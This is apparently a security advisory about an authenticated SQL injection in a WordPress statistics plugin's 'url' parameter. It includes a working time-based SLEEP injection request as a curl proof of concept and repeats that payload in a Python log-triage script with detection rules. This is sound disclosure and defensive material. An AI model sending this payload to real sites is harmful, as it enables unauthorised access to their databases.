Description

The plugins do not properly sanitise and escape the url parameter before using it in a SQL statement, leading to an SQL injection exploitable by any authenticated user, such as a subscriber.

curl 'https://example.com/burst-statistics-endpoint.php' \
-H 'content-type: text/plain;charset=UTF-8' \
--data-raw $'"{\\"fingerprint\\":false,\\"uid\\":\\"437a969907141c6c2042731efd2da038\\",\\"url\\":\\"https://example.com/abc\'/**/OR/**/(SELECT/**/*/**/FROM/**/(SELECT/**/SLEEP(5))a)/**/OR/**/1=\'\\",\\"time_on_page\\":6907,\\"completed_goals\\":[]}"' \
--compressed
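
For triage of logged requests to this endpoint, the following is an added example (not the plugin's code) that unwraps the double-encoded JSON body shown above and reports which checks the url field trips. The rule set and the names `decode_body`, `inspect` and `RULES` are assumptions made for illustration, and both sample bodies are constructed.

```python
import json
import re
from urllib.parse import unquote, urlsplit

# Heuristic rules (assumed for this example) applied to the decoded url field.
RULES = [
    ("quote", re.compile(r"'")),                       # breaks out of a SQL string literal
    ("inline_comment", re.compile(r"/\*.*?\*/")),      # /**/ used in place of whitespace
    ("time_delay_call", re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I)),
]

def decode_body(raw: str) -> dict:
    """The request body is a JSON string whose content is itself a JSON object."""
    value = json.loads(raw)
    if isinstance(value, str):          # unwrap the outer string layer
        value = json.loads(value)
    if not isinstance(value, dict):
        raise ValueError("unexpected body shape")
    return value

def inspect(raw: str) -> list[str]:
    """Return the names of the rules the url field trips; an empty list means clean."""
    url = decode_body(raw).get("url")
    if not isinstance(url, str):
        return ["url_not_string"]
    decoded = unquote(url)              # also look at percent-decoded form
    hits = [name for name, rx in RULES if rx.search(decoded)]
    if urlsplit(url).scheme not in ("http", "https"):
        hits.append("bad_scheme")
    return hits

def make_body(url: str) -> str:
    """Build a constructed sample body in the same double-encoded shape."""
    inner = {"fingerprint": False, "uid": "437a969907141c6c2042731efd2da038",
             "url": url, "time_on_page": 6907, "completed_goals": []}
    return json.dumps(json.dumps(inner))

# Constructed samples: the url value from the request above, and a benign page url.
FLAGGED = make_body("https://example.com/abc'/**/OR/**/(SELECT/**/*/**/FROM/**/"
                    "(SELECT/**/SLEEP(5))a)/**/OR/**/1='")
BENIGN = make_body("https://example.com/select-a-plan")

if __name__ == "__main__":
    for label, body in (("flagged", FLAGGED), ("benign", BENIGN)):
        print(label, inspect(body))
```

A check like this only helps with log review or request filtering; the fix itself belongs in the plugin, where the url value must reach the database through a parameterised query.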